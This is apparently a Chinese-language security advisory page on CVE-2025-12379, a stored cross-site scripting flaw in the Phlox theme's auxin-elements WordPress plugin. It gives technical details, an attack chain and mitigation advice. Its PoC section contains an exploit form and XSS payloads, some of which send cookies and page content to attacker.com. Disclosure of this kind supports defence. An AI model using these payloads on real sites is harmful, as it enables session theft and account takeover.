IPBUF安全漏洞报告
English
CVE-2025-12379 CVSS 6.4 中危

CVE-2025-12379 WordPress Phlox主题插件存储型XSS漏洞

披露日期: 2026-01-10
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-12379
漏洞类型
存储型跨站脚本攻击(XSS)
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Shortcodes and extra features for Phlox theme plugin for WordPress (auxin-elements)

相关标签

存储型XSSWordPress插件漏洞CVE-2025-12379Phlox主题auxin-elementsElementorCross-Site ScriptingAuthenticated Attack

漏洞概述

CVE-2025-12379是WordPress平台Phlox主题插件(auxin-elements)中的一个存储型跨站脚本(XSS)漏洞。该插件为Phlox主题提供短代码和扩展功能。漏洞源于插件的heading-modern组件对用户输入的'tag'和'title_tag'参数缺乏充分的输入消毒和输出转义处理。攻击者利用此漏洞可以在网页中注入恶意JavaScript代码。由于漏洞属于存储型XSS,恶意脚本会被永久保存在服务器端,所有访问包含恶意代码页面的用户都会受到攻击。攻击者只需拥有WordPress Contributor级别(贡献者)的账户权限即可发起攻击,无需管理员权限。这使得漏洞的利用门槛相对较低,对使用该插件的网站构成中等程度的安全威胁。

技术细节

漏洞存在于auxin-elements插件的Elementor小部件heading-modern.php文件中,具体在处理'tag'和'title_tag'参数的逻辑中。当用户在WordPress后台使用Elementor编辑器添加现代标题(heading-modern)组件时,攻击者可以通过这两个参数注入恶意脚本代码。由于插件仅对输入进行了表面处理,未能有效过滤HTML标签和JavaScript事件处理器,恶意代码被直接存储到数据库中。当其他用户访问包含该标题的页面时,浏览器会执行注入的恶意脚本。攻击者可利用此漏洞窃取会话Cookie、劫持用户账户、执行任意操作或重定向用户到钓鱼页面。CVSS 3.1评分6.4(中危)反映了该漏洞需要认证但影响范围广的特点。

攻击链分析

STEP 1
步骤1
攻击者获取WordPress Contributor级别账户权限
STEP 2
步骤2
攻击者登录WordPress后台,使用Elementor编辑器创建或编辑页面
STEP 3
步骤3
添加heading-modern小部件,在tag或title_tag参数中注入XSS payload
STEP 4
步骤4
保存页面,恶意脚本被永久存储到数据库中
STEP 5
步骤5
任何访问该页面的用户都会触发执行注入的JavaScript代码
STEP 6
步骤6
攻击者通过XSS窃取用户Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-12379 PoC: Stored XSS via tag parameter --> <!-- Requires Contributor-level access in WordPress --> <!-- Method 1: Using Elementor with malicious tag parameter --> <form action="https://target-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="elementor_ajax" /> <input type="hidden" name="server_edit" value="1" /> <input type="hidden" name="model" value='{"elements":[{"id":"123","elType":"widget","widgetType":"heading-modern","settings":{"title":"Test Heading","tag":"img","title_tag":"script","__globals__":{}}}]}' /> <!-- Inject XSS payload --> <input type="hidden" name="js_vars" value='[{"tag":"img","onerror":"alert(String.fromCharCode(88,83,83))"}]' /> <input type="submit" value="Exploit"> </form> <!-- Simple XSS payload examples --> <!-- <script>alert(document.cookie)</script> --> <!-- <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)> --> <!-- <svg/onload=fetch('https://attacker.com/steal?data='+btoa(document.body.innerHTML))>

影响范围

auxin-elements <= 2.17.13

防御指南

临时缓解措施
如果无法立即更新插件,可临时禁用Elementor编辑器中的heading-modern组件,或使用WordPress安全插件(如Wordfence)添加XSS防护规则。同时监控管理员账户活动,及时发现异常行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表